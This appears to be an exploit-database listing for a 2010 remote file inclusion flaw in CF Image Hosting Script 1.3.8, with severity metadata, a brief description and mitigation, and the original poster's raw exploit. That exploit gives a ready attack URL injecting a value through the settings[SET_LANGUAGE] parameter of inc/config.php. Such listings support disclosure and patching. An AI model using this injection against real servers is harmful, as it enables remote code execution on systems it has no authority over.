header-logo
Suggest Exploit
vendor:
CF Image Host
by:
FoX HaCkEr
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: CF Image Host
Affected Version From: 1.3.8
Affected Version To: 1.3.8
Patch Exists: NO
Related CWE: N/A
CPE: a:codefuture:cf_image_host
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CF Image Hosting Script Remote File Inclusion

A remote file inclusion vulnerability exists in CF Image Hosting Script version 1.3.8. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations. Also, ensure that the web server is configured to deny access to sensitive files.
Source

Exploit-DB raw data:

=================================
CF Image Hosting Script <===remote file inclode 
=================================
# CF Image Hosting Script <===remote file inclode 

# Date: 2010-08-29

# Author : FoX HaCkEr

#Contact : MKQ@HoTmAiL.CoM

# SiTe : www.sec4ever.com

# Download: http://codefuture.co.uk/projects/imagehost

# Version:1.3.8
  
# Google dork: [sorry]

======================================================================================================
exploit :

http://localhost/cf_image_host_v1.3.81/inc/config.php?settings[SET_LANGUAGE]=[EV!L]

=======================================================================================================

Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE